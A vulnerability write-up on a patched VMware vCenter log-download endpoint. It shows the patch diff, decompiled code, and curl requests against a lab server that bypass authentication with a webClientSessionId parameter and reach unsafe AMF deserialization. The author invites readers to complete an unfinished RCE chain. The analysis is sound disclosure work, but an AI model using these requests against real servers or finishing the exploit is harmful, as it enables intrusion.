CVE-2021-21980
Description
The vSphere Web Client (FLEX/Flash) contains an unauthorized arbitrary file read vulnerability. A malicious actor with network access to port 443 on vCenter Server may exploit this issue to gain access to sensitive information.
Technical Analysis
The Long Tail of CVE-2017-5641
This is not CVE-2021-21980 or CVE-2021-22049 but rather a curious case of AMF deserialization that was patched against auth bypass in the same update. My notes are as follows. RCE is incomplete, but maybe you can finish it!
Analyzing the patch and discovering the auth bypass
public void doFilter(ServletRequest paramServletRequest, ServletResponse paramServletResponse, FilterChain paramFilterChain) throws IOException, ServletException { @@ -90,13 +122,11 @@ public class SessionManagementFilter implements Filter { SessionUtil.setHttpRequest(httpServletRequest); addHstsHeader(httpServletRequest, httpServletResponse); String str = httpServletRequest.getRequestURI(); - boolean bool = str.endsWith("download/logs"); - if (this._clientIdSecurityEnabled && bool) { - boolean bool1 = validateClientId(httpServletRequest, httpServletResponse); - if (!bool1) { - httpServletResponse.setStatus(401); - return; - } + if (this._authenticationProtectionEnabled && + !isSessionAuthenticated(httpServletRequest.getSession()) && !SessionUtil.isRequestWithValidSessionIndexCookie(httpServletRequest)) { + _logger.warn("Rejecting request for URI: " + str + " without a valid client id!"); + httpServletResponse.setStatus(401); + return; } if (this._isH5Client || str.endsWith(".html")) { HttpSession httpSession = httpServletRequest.getSession(true);
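Review bot: the replacement check in doFilter is gated entirely on `_authenticationProtectionEnabled`, and the removed `download/logs` branch is not kept as a fallback, so with that flag off the endpoint is no longer checked at all; confirm the flag defaults to on, or leave the per-path check in place underneath the new one. The removed branch is also worth spelling out in the commit message as the root of the bypass: it delegated to validateClientId, which returns `(str1 != null || str2 != null)`, so a request-supplied `webClientSessionId` header or parameter satisfied it with no session whatsoever, and the new condition correctly stops consulting request-supplied values. Two smaller points: `isSessionAuthenticated(httpServletRequest.getSession())` creates a session for every request it is about to reject, where `getSession(false)` would do; and the warning text "without a valid client id!" no longer describes what is being tested, which is now an authenticated session or a valid session-index cookie.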
// Pre-patch check reached from the removed download/logs branch in doFilter. It passes
// if *either* the session already carries a client ID *or* the request merely supplies
// one, so an unauthenticated request only has to include webClientSessionId.
private boolean validateClientId(HttpServletRequest paramHttpServletRequest, HttpServletResponse paramHttpServletResponse) {
    String str1 = SessionUtil.getClientId(paramHttpServletRequest.getSession());
    String str2 = extractClientId(paramHttpServletRequest);
    return (str1 != null || str2 != null);
}

// The request-supplied value is taken from a header first, then from a query/form parameter.
private String extractClientId(HttpServletRequest paramHttpServletRequest) {
    String str = paramHttpServletRequest.getHeader("webClientSessionId");
    if (str == null)
        str = paramHttpServletRequest.getParameter("webClientSessionId");
    return str;
}
Testing a GET request without the webClientSessionId parameter
wvu@kharak:~$ curl -kv https://172.16.57.237/vsphere-client/download/logs
*   Trying 172.16.57.237:443...
* Connected to 172.16.57.237 (172.16.57.237) port 443 (#0)
* ALPN, offering h2
* ALPN, offering http/1.1
* TLSv1.3 (OUT), TLS handshake, Client hello (1):
* TLSv1.3 (IN), TLS handshake, Server hello (2):
* TLSv1.2 (IN), TLS handshake, Certificate (11):
* TLSv1.2 (IN), TLS handshake, Server key exchange (12):
* TLSv1.2 (IN), TLS handshake, Server finished (14):
* TLSv1.2 (OUT), TLS handshake, Client key exchange (16):
* TLSv1.2 (OUT), TLS change cipher, Change cipher spec (1):
* TLSv1.2 (OUT), TLS handshake, Finished (20):
* TLSv1.2 (IN), TLS handshake, Finished (20):
* SSL connection using TLSv1.2 / ECDHE-RSA-AES256-GCM-SHA384
* ALPN, server did not agree to a protocol
* Server certificate:
*  subject: CN=172.16.57.237; C=US
*  start date: Nov 30 23:59:14 2021 GMT
*  expire date: Dec 1 11:59:14 2023 GMT
*  issuer: CN=CA; DC=vsphere; DC=local; C=US; ST=California; O=photon-machine; OU=VMware Engineering
*  SSL certificate verify result: unable to get local issuer certificate (20), continuing anyway.
> GET /vsphere-client/download/logs HTTP/1.1
> Host: 172.16.57.237
> User-Agent: curl/7.80.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 401
< Set-Cookie: JSESSIONID=87EF28C1FB437E91D3A46739E6FC1774; Path=/vsphere-client; Secure; HttpOnly
< Content-Length: 0
< Date: Sat, 04 Dec 2021 00:57:08 GMT
< Server: Anonymous
<
* Connection #0 to host 172.16.57.237 left intact
wvu@kharak:~$
Testing a GET request with the webClientSessionId parameter
wvu@kharak:~$ curl -kv https://172.16.57.237/vsphere-client/download/logs?webClientSessionId=nope
*   Trying 172.16.57.237:443...
* Connected to 172.16.57.237 (172.16.57.237) port 443 (#0)
* ALPN, offering h2
* ALPN, offering http/1.1
* TLSv1.3 (OUT), TLS handshake, Client hello (1):
* TLSv1.3 (IN), TLS handshake, Server hello (2):
* TLSv1.2 (IN), TLS handshake, Certificate (11):
* TLSv1.2 (IN), TLS handshake, Server key exchange (12):
* TLSv1.2 (IN), TLS handshake, Server finished (14):
* TLSv1.2 (OUT), TLS handshake, Client key exchange (16):
* TLSv1.2 (OUT), TLS change cipher, Change cipher spec (1):
* TLSv1.2 (OUT), TLS handshake, Finished (20):
* TLSv1.2 (IN), TLS handshake, Finished (20):
* SSL connection using TLSv1.2 / ECDHE-RSA-AES256-GCM-SHA384
* ALPN, server did not agree to a protocol
* Server certificate:
*  subject: CN=172.16.57.237; C=US
*  start date: Nov 30 23:59:14 2021 GMT
*  expire date: Dec 1 11:59:14 2023 GMT
*  issuer: CN=CA; DC=vsphere; DC=local; C=US; ST=California; O=photon-machine; OU=VMware Engineering
*  SSL certificate verify result: unable to get local issuer certificate (20), continuing anyway.
> GET /vsphere-client/download/logs?webClientSessionId=nope HTTP/1.1
> Host: 172.16.57.237
> User-Agent: curl/7.80.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 405
< Set-Cookie: JSESSIONID=3DDE7D387076B9E7814A940DACA2B6B4; Path=/vsphere-client; Secure; HttpOnly; SameSite=None
< Allow: POST
< Cache-Control: no-cache, no-store, max-age=0, must-revalidate
< Pragma: no-cache
< Expires: 0
< Strict-Transport-Security: max-age=31536000 ; includeSubDomains
< X-XSS-Protection: 1; mode=block
< X-Frame-Options: SAMEORIGIN
< X-Content-Type-Options: nosniff
< Content-Type: text/html;charset=utf-8
< Content-Language: en
< Content-Length: 749
< Date: Sat, 04 Dec 2021 00:57:46 GMT
< Server: Anonymous
<
* Connection #0 to host 172.16.57.237 left intact
<!doctype html><html lang="en"><head><title>HTTP Status 405 – Method Not Allowed</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 405 – Method Not Allowed</h1><hr class="line" /><p><b>Type</b> Status Report</p><p><b>Message</b> Request method 'GET' not supported</p><p><b>Description</b> The method received in the request-line is known by the origin server but not supported by the target resource.</p><hr class="line" /><h3>Apache Tomcat/8.5.61</h3></body></html>wvu@kharak:~$
[2021-12-04T00:57:46.537Z] [WARN ] http-nio-9090-exec-2 70000066 ###### ###### o.s.web.servlet.mvc.support.DefaultHandlerExceptionResolver Resolved exception caused by handler execution: org.springframework.web.HttpRequestMethodNotSupportedException: Request method 'GET' not supported
Testing a POST request with the webClientSessionId parameter
wvu@kharak:~$ curl -kv https://172.16.57.237/vsphere-client/download/logs -d webClientSessionId=nope
*   Trying 172.16.57.237:443...
* Connected to 172.16.57.237 (172.16.57.237) port 443 (#0)
* ALPN, offering h2
* ALPN, offering http/1.1
* TLSv1.3 (OUT), TLS handshake, Client hello (1):
* TLSv1.3 (IN), TLS handshake, Server hello (2):
* TLSv1.2 (IN), TLS handshake, Certificate (11):
* TLSv1.2 (IN), TLS handshake, Server key exchange (12):
* TLSv1.2 (IN), TLS handshake, Server finished (14):
* TLSv1.2 (OUT), TLS handshake, Client key exchange (16):
* TLSv1.2 (OUT), TLS change cipher, Change cipher spec (1):
* TLSv1.2 (OUT), TLS handshake, Finished (20):
* TLSv1.2 (IN), TLS handshake, Finished (20):
* SSL connection using TLSv1.2 / ECDHE-RSA-AES256-GCM-SHA384
* ALPN, server did not agree to a protocol
* Server certificate:
*  subject: CN=172.16.57.237; C=US
*  start date: Nov 30 23:59:14 2021 GMT
*  expire date: Dec 1 11:59:14 2023 GMT
*  issuer: CN=CA; DC=vsphere; DC=local; C=US; ST=California; O=photon-machine; OU=VMware Engineering
*  SSL certificate verify result: unable to get local issuer certificate (20), continuing anyway.
> POST /vsphere-client/download/logs HTTP/1.1
> Host: 172.16.57.237
> User-Agent: curl/7.80.0
> Accept: */*
> Content-Length: 23
> Content-Type: application/x-www-form-urlencoded
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 200
< Set-Cookie: JSESSIONID=950054453E83C0E133D9048BD60EEB61; Path=/vsphere-client; Secure; HttpOnly
< Cache-Control: no-cache, no-store, max-age=0, must-revalidate
< Pragma: no-cache
< Expires: 0
< Strict-Transport-Security: max-age=31536000 ; includeSubDomains
< X-XSS-Protection: 1; mode=block
< X-Frame-Options: SAMEORIGIN
< X-Content-Type-Options: nosniff
< Content-Length: 0
< Date: Sat, 04 Dec 2021 00:58:47 GMT
< Server: Anonymous
<
* Connection #0 to host 172.16.57.237 left intact
wvu@kharak:~$
[2021-12-04T00:58:47.452Z] [WARN ] http-nio-9090-exec-5 70000067 ###### ###### com.vmware.vsphere.client.logbundle.DownloadLogController ClientId is null.
[2021-12-04T00:58:47.452Z] [ERROR] http-nio-9090-exec-5 70000067 ###### ###### com.vmware.vsphere.client.logbundle.DownloadLogController There is no spec for downloading logs in the request.
Analyzing the DownloadLogController class and discovering AMF deserialization
@RequestMapping(method = {RequestMethod.POST})
public void downloadLogBundles(final HttpServletRequest request, final HttpServletResponse response)
        throws IOException, Exception {
    final DownloadingLogsTask downloadingLogsTask;
    final HttpSession session = request.getSession();
    Map<String, String[]> map = request.getParameterMap();
    // The client ID comes from the session only; the request-supplied webClientSessionId
    // that satisfied the filter is never looked at here, so an unauthenticated request
    // simply logs "ClientId is null." and carries on.
    final String clientId = SessionUtil.getClientId(session);
    if (clientId == null)
        _logger.warn("ClientId is null.");
    // Both specs are parsed from request parameters before anything else happens.
    final SelectedLogsSpec selectedLogsSpec = processSelectedLogsSpecParameter(map);
    final Collection<LogBundleDownloadSpec> logBundleDownloadSpecs = processLogBundleDownloadSpecs(map);
    if (selectedLogsSpec == null && logBundleDownloadSpecs == null) {
        _logger.error("There is no spec for downloading logs in the request.");
        return;
    }
    ManagedObjectReference managedObjectReference =
            DownloadingLogsTask.findTaskTarget(selectedLogsSpec, logBundleDownloadSpecs);
    if (managedObjectReference != null) {
        int fileId = extractFileIdParam(map);
        downloadingLogsTask = new DownloadingLogsTask(clientId, managedObjectReference, fileId,
                this._queryExecutor, this._taskRegistry);
    } else {
        downloadingLogsTask = null;
    }
    try {
        final ZipOutputStream zipStream = new ZipOutputStream((OutputStream)response.getOutputStream());
        Runnable runnable = new Runnable() {
            public void run() {
                try {
                    SessionUtil.setHttpRequest(request);
                    SessionUtil.setHttpSession(session);
                    response.setContentType("application/zip");
                    if (selectedLogsSpec == null) {
                        KeyStore keyStore = DownloadLogController.this._keystoreService.getKeyStore();
                        Map map = DownloadLogController.this.parseParameters(logBundleDownloadSpecs, clientId, keyStore);
                        DownloadLogController.this.writeZipFile(map, zipStream, clientId, downloadingLogsTask);
                    } else {
                        if (selectedLogsSpec.vCenterLogsIncluded) {
                            ManagedObjectReference managedObjectReference =
                                    DownloadLogController.this.invokeGenerateLogBundlesTask(selectedLogsSpec.targetObjectReference, clientId);
                            DownloadLogController.this.writeVcLogsToStream(zipStream, managedObjectReference, selectedLogsSpec, clientId, downloadingLogsTask);
                            DownloadLogController.this.writeHostLogsToStream(zipStream, selectedLogsSpec, clientId, downloadingLogsTask);
                        } else {
                            DownloadLogController.this.writeHostLogsToStream(zipStream, selectedLogsSpec, clientId, downloadingLogsTask);
                        }
                        zipStream.finish();
                    }
                    if (downloadingLogsTask != null)
                        downloadingLogsTask.updateState(TaskState.SUCCESS, null);
                } catch (InterruptedException interruptedException) {
                    DownloadLogController._logger.info("Downloading logs task thread was interrupted.");
                    Thread.currentThread().interrupt();
                } catch (WriteIOException writeIOException) {
                    if (downloadingLogsTask != null) {
                        DownloadLogController._logger.info("Downloading logs is cancelled.");
                        DownloadLogController._logger.debug("Exception in downloading logs: ", writeIOException);
                        downloadingLogsTask.updateState(TaskState.CANCELED, null);
                    }
                } catch (Exception exception) {
                    DownloadLogController._logger.error("Error downloading logs.", exception);
                    if (downloadingLogsTask != null) {
                        TaskState taskState = downloadingLogsTask.getState();
                        if (!TaskState.CANCELED.equals(taskState))
                            downloadingLogsTask.updateState(TaskState.ERROR, exception);
                    }
                }
            }
        };
        FutureTask futureTask = new FutureTask(runnable, null);
        if (downloadingLogsTask != null)
            TaskUtil.addClientTaskKeyFutureCloseablePair(downloadingLogsTask.getKey(), futureTask, zipStream);
        try {
            ExecutorUtil.executeTasks(Collections.singleton(futureTask), this._executor);
        } catch (InterruptedException interruptedException) {}
        if (downloadingLogsTask != null)
            TaskUtil.removeClientTaskKeyFromMap(downloadingLogsTask.getKey());
    } catch (Exception exception) {
        if (downloadingLogsTask != null && TaskState.RUNNING == (downloadingLogsTask.getClientTaskInfo()).state)
            downloadingLogsTask.updateState(TaskState.ERROR, exception);
        throw exception;
    }
}
private SelectedLogsSpec processSelectedLogsSpecParameter(Map<String, String[]> paramMap) throws IOException {
    String[] arrayOfString = paramMap.get("SelectedLogsSpec");
    if (ArrayUtil.isNullOrEmpty((Object[])arrayOfString))
        return null;
    return parseSelectedLogsSpec(arrayOfString[0]);
}

private static SelectedLogsSpec parseSelectedLogsSpec(String paramString) throws IOException {
    // flex.messaging.util.Base64, not java.util.Base64 (see the stack trace below): flush()
    // throws IllegalStateException when the input ends in a partial 4-byte block.
    Base64.Decoder decoder = new Base64.Decoder();
    decoder.decode(paramString);
    byte[] arrayOfByte = decoder.flush();
    // The marshalling-context class loader is saved here and restored in finally, so the
    // serialization context built below evidently swaps it for SelectedLogsSpec's loader.
    ClassLoader classLoader1 = TypeMarshallingContext.getTypeMarshallingContext().getClassLoader();
    ClassLoader classLoader2 = SelectedLogsSpec.class.getClassLoader();
    Amf3Input amf3Input = new Amf3Input(getAmfSerializationContext(classLoader2));
    amf3Input.setInputStream(new ByteArrayInputStream(arrayOfByte));
    SelectedLogsSpec selectedLogsSpec = null;
    try {
        // Attacker-controlled AMF3 is read object by object until a SelectedLogsSpec turns up,
        // either directly, inside an Object[], or as a Map value.
        while (amf3Input.available() > 0) {
            Object object = amf3Input.readObject();
            if (object instanceof SelectedLogsSpec) {
                selectedLogsSpec = (SelectedLogsSpec)object;
            } else if (object instanceof Object[]) {
                for (Object object1 : (Object[])object) {
                    if (object1 instanceof SelectedLogsSpec) {
                        selectedLogsSpec = (SelectedLogsSpec)object1;
                        break;
                    }
                }
            } else if (object instanceof Map) {
                for (SelectedLogsSpec selectedLogsSpec1 : ((Map)object).values()) {
                    if (selectedLogsSpec1 instanceof SelectedLogsSpec) {
                        selectedLogsSpec = selectedLogsSpec1;
                        break;
                    }
                }
            }
            if (selectedLogsSpec != null)
                break;
        }
    } catch (ClassNotFoundException classNotFoundException) {
        _logger.warn("The AMF deserialization fails.", classNotFoundException);
    } finally {
        amf3Input.close();
        TypeMarshallingContext.getTypeMarshallingContext().setClassLoader(classLoader1);
    }
    return selectedLogsSpec;
}
Testing AMF deserialization using a bogus string
wvu@kharak:~$ curl -kv https://172.16.57.237/vsphere-client/download/logs -d "webClientSessionId=nope&SelectedLogsSpec=lol"
*   Trying 172.16.57.237:443...
* Connected to 172.16.57.237 (172.16.57.237) port 443 (#0)
* ALPN, offering h2
* ALPN, offering http/1.1
* TLSv1.3 (OUT), TLS handshake, Client hello (1):
* TLSv1.3 (IN), TLS handshake, Server hello (2):
* TLSv1.2 (IN), TLS handshake, Certificate (11):
* TLSv1.2 (IN), TLS handshake, Server key exchange (12):
* TLSv1.2 (IN), TLS handshake, Server finished (14):
* TLSv1.2 (OUT), TLS handshake, Client key exchange (16):
* TLSv1.2 (OUT), TLS change cipher, Change cipher spec (1):
* TLSv1.2 (OUT), TLS handshake, Finished (20):
* TLSv1.2 (IN), TLS handshake, Finished (20):
* SSL connection using TLSv1.2 / ECDHE-RSA-AES256-GCM-SHA384
* ALPN, server did not agree to a protocol
* Server certificate:
*  subject: CN=172.16.57.237; C=US
*  start date: Nov 30 23:59:14 2021 GMT
*  expire date: Dec 1 11:59:14 2023 GMT
*  issuer: CN=CA; DC=vsphere; DC=local; C=US; ST=California; O=photon-machine; OU=VMware Engineering
*  SSL certificate verify result: unable to get local issuer certificate (20), continuing anyway.
> POST /vsphere-client/download/logs HTTP/1.1
> Host: 172.16.57.237
> User-Agent: curl/7.80.0
> Accept: */*
> Content-Length: 44
> Content-Type: application/x-www-form-urlencoded
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 500
< Set-Cookie: JSESSIONID=587387E51FA794E6CE03FB9DBB454777; Path=/vsphere-client; Secure; HttpOnly
< Cache-Control: no-cache, no-store, max-age=0, must-revalidate
< Pragma: no-cache
< Expires: 0
< Strict-Transport-Security: max-age=31536000 ; includeSubDomains
< X-XSS-Protection: 1; mode=block
< X-Frame-Options: SAMEORIGIN
< X-Content-Type-Options: nosniff
< Content-Type: text/html;charset=utf-8
< Content-Length: 2977
< Date: Sat, 04 Dec 2021 01:02:05 GMT
< Connection: close
< Server: Anonymous
<
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- saved from url=(0014)about:internet -->
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<style type="text/css" media="screen"> html { background: #3075ab; /* Old browsers */ background: -moz-linear-gradient(top, #3a8dc8 0%, #183a62 100%); /* FF3.6+ */ background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#3a8dc8), color-stop(100%,#183a62)); /* Chrome,Safari4+ */ background: -webkit-linear-gradient(top, #3a8dc8 0%,#183a62 100%); /* Chrome10+,Safari5.1+ */ background: -o-linear-gradient(top, #3a8dc8 0%,#183a62 100%); /* Opera 11.10+ */ background: -ms-linear-gradient(top, #3a8dc8 0%,#183a62 100%); /* IE10+ */ background: linear-gradient(to bottom, #3a8dc8 0%,#183a62 100%); /* W3C */ filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#3a8dc8', endColorstr='#183a62',GradientType=0 ); /* IE6-9 */ background-repeat: no-repeat; height: 100%; overflow: auto; margin: 0; padding: 0; } #errorAreaWrapper { position: relative; float: left; left: 50%; margin-top: 30px; } #errorArea { position: relative; float: left; left: -50%; padding: 15px; background-color: white; font-size: 14px; color: #000000; font-family: Georgia, Arial, Helvetica, sans-serif; border: 1px solid black; } #errorImage { border: 0; margin-right: 10px; display: inline-block; vertical-align: top; } #errorAllText { display: inline-block; vertical-align: top; min-width: 500px; max-width: 700px; } #errorSorry { font-weight: bold; } #errorMessage { padding-top: 10px; padding-bottom: 10px; } #errorCheckLog { font-style: italic; } </style>
</head>
<body>
<div id="errorAreaWrapper">
<div id="errorArea">
<div id="errorImage"><img src="/vsphere-client/assets/warning48x.png" alt="Error" /></div>
<div id="errorAllText">
<div id="errorSorry">A server error occurred.</div>
<div id="errorMessage">a partial block (3 of 4 bytes) was dropped, decoded data is probably truncated!</div>
<div id="errorCheckLog">Check the vSphere Web Client server logs for details.</div>
</div>
</div>
</div>
</body>
</html>
* Closing connection 0
* TLSv1.2 (OUT), TLS alert, close notify (256):
wvu@kharak:~$
[2021-12-04T01:02:05.830Z] [WARN ] http-nio-9090-exec-8 70000068 ###### ###### com.vmware.vsphere.client.logbundle.DownloadLogController ClientId is null.
[2021-12-04T01:02:05.831Z] [ERROR] http-nio-9090-exec-8 o.a.c.c.C.[.[localhost].[/vsphere-client].[downloadManager] Servlet.service() for servlet [downloadManager] in context with path [/vsphere-client] threw exception [Request processing failed; nested exception is java.lang.IllegalStateException: a partial block (3 of 4 bytes) was dropped, decoded data is probably truncated!] with root cause
java.lang.IllegalStateException: a partial block (3 of 4 bytes) was dropped, decoded data is probably truncated!
    at flex.messaging.util.Base64$Decoder.flush(Base64.java:136)
    at com.vmware.vsphere.client.logbundle.DownloadLogController.parseSelectedLogsSpec(DownloadLogController.java:732)
    at com.vmware.vsphere.client.logbundle.DownloadLogController.processSelectedLogsSpecParameter(DownloadLogController.java:584)
    at com.vmware.vsphere.client.logbundle.DownloadLogController.downloadLogBundles(DownloadLogController.java:201)
    at sun.reflect.GeneratedMethodAccessor196.invoke(Unknown Source)
    at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
    at java.lang.reflect.Method.invoke(Method.java:498)
    at org.springframework.web.bind.annotation.support.HandlerMethodInvoker.invokeHandlerMethod(HandlerMethodInvoker.java:181)
    at org.springframework.web.servlet.mvc.annotation.AnnotationMethodHandlerAdapter.invokeHandlerMethod(AnnotationMethodHandlerAdapter.java:440)
    at org.springframework.web.servlet.mvc.annotation.AnnotationMethodHandlerAdapter.handle(AnnotationMethodHandlerAdapter.java:428)
    at org.springframework.web.servlet.DispatcherServlet.doDispatch(DispatcherServlet.java:967)
    at org.springframework.web.servlet.DispatcherServlet.doService(DispatcherServlet.java:901)
    at org.springframework.web.servlet.FrameworkServlet.processRequest(FrameworkServlet.java:970)
    at org.springframework.web.servlet.FrameworkServlet.doPost(FrameworkServlet.java:872)
    at javax.servlet.http.HttpServlet.service(HttpServlet.java:661)
    at org.springframework.web.servlet.FrameworkServlet.service(FrameworkServlet.java:846)
    at javax.servlet.http.HttpServlet.service(HttpServlet.java:742)
    at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:231)
    at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166)
    at org.apache.tomcat.websocket.server.WsFilter.doFilter(WsFilter.java:52)
    at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193)
    at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166)
    at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:317)
    at org.springframework.security.web.access.intercept.FilterSecurityInterceptor.invoke(FilterSecurityInterceptor.java:127)
    at org.springframework.security.web.access.intercept.FilterSecurityInterceptor.doFilter(FilterSecurityInterceptor.java:91)
    at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:331)
    at org.springframework.security.web.access.ExceptionTranslationFilter.doFilter(ExceptionTranslationFilter.java:114)
    at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChain
Proxy.java:331)
    at org.springframework.security.web.session.SessionManagementFilter.doFilter(SessionManagementFilter.java:137)
    at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:331)
    at org.springframework.security.web.authentication.AnonymousAuthenticationFilter.doFilter(AnonymousAuthenticationFilter.java:111)
    at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:331)
    at org.springframework.security.web.authentication.rememberme.RememberMeAuthenticationFilter.doFilter(RememberMeAuthenticationFilter.java:150)
    at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:331)
    at org.springframework.security.web.servletapi.SecurityContextHolderAwareRequestFilter.doFilter(SecurityContextHolderAwareRequestFilter.java:170)
    at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:331)
    at org.springframework.security.web.savedrequest.RequestCacheAwareFilter.doFilter(RequestCacheAwareFilter.java:63)
    at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:331)
    at org.springframework.security.web.authentication.AbstractAuthenticationProcessingFilter.doFilter(AbstractAuthenticationProcessingFilter.java:200)
    at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:331)
    at org.springframework.security.web.authentication.logout.LogoutFilter.doFilter(LogoutFilter.java:116)
    at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:331)
    at org.springframework.security.web.header.HeaderWriterFilter.doFilterInternal(HeaderWriterFilter.java:66)
    at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:107)
    at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:331)
    at org.springframework.security.web.context.request.async.WebAsyncManagerIntegrationFilter.doFilterInternal(WebAsyncManagerIntegrationFilter.java:56)
    at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:107)
    at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:331)
    at org.springframework.security.web.context.SecurityContextPersistenceFilter.doFilter(SecurityContextPersistenceFilter.java:105)
    at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:331)
    at com.vmware.vise.security.websso.SecurityRequestWrapperFilter.doFilterInternal(SecurityRequestWrapperFilter.java:47)
    at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:107)
    at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:331)
    at org.springframework.security.web.FilterChainProxy.doFilterInternal(FilterChainProxy.java:214)
    at org.springframework.security.web.FilterChainProxy.doFilter(FilterChainProxy.java:177)
    at org.springframework.web.filter.DelegatingFilterProxy.invokeDelegate(DelegatingFilterProxy.java:347)
    at org.springframework.web.filter.DelegatingFilterProxy.doFilter(DelegatingFilterProxy.java:263)
    at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193)
    at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166)
    at com.vmware.vise.security.SessionManagementFilter.doFilter(SessionManagementFilter.java:177)
    at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193)
    at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166)
    at com.vmware.vsphere.client.logging.MDCLogFilter.doFilterInternal(MDCLogFilter.java:41)
    at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:107)
    at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193)
    at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166)
    at com.vmware.vise.extensionfw.DeploymentFilter.doFilter(DeploymentFilter.java:55)
    at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193)
    at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166)
    at com.vmware.vise.util.jsp.JspFilter.doFilterInternal(JspFilter.java:91)
    at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:107)
    at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193)
    at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166)
    at com.vmware.vise.security.SameSiteCookieHeaderFilter.doFilter(SameSiteCookieHeaderFilter.java:73)
    at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193)
    at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166)
    at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:199)
    at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:97)
    at org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:544)
    at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:143)
    at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:81)
    at org.apache.catalina.valves.RemoteIpValve.invoke(RemoteIpValve.java:764)
    at org.eclipse.virgo.web.tomcat.support.ApplicationNameTrackingValve.invoke(ApplicationNameTrackingValve.java:33)
    at org.apache.catalina.valves.AbstractAccessLogValve.invoke(AbstractAccessLogValve.java:690)
    at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:78)
    at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:343)
    at org.apache.coyote.http11.Http11Processor.service(Http11Processor.java:616)
    at org.apache.coyote.AbstractProcessorLight.process(AbstractProcessorLight.java:65)
    at org.apache.coyote.AbstractProtocol$ConnectionHandler.process(AbstractProtocol.java:831)
    at org.apache.tomcat.util.net.NioEndpoint$SocketProcessor.doRun(NioEndpoint.java:1634)
    at org.apache.tomcat.util.net.SocketProcessorBase.run(SocketProcessorBase.java:49)
    at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149)
    at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624)
    at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61)
    at java.lang.Thread.run(Thread.java:748)
Testing AMF deserialization using a Base64-encoded string
wvu@kharak:~$ curl -kv https://172.16.57.237/vsphere-client/download/logs -d "webClientSessionId=nope&SelectedLogsSpec=QQ=="
*   Trying 172.16.57.237:443...
* Connected to 172.16.57.237 (172.16.57.237) port 443 (#0)
* ALPN, offering h2
* ALPN, offering http/1.1
* TLSv1.3 (OUT), TLS handshake, Client hello (1):
* TLSv1.3 (IN), TLS handshake, Server hello (2):
* TLSv1.2 (IN), TLS handshake, Certificate (11):
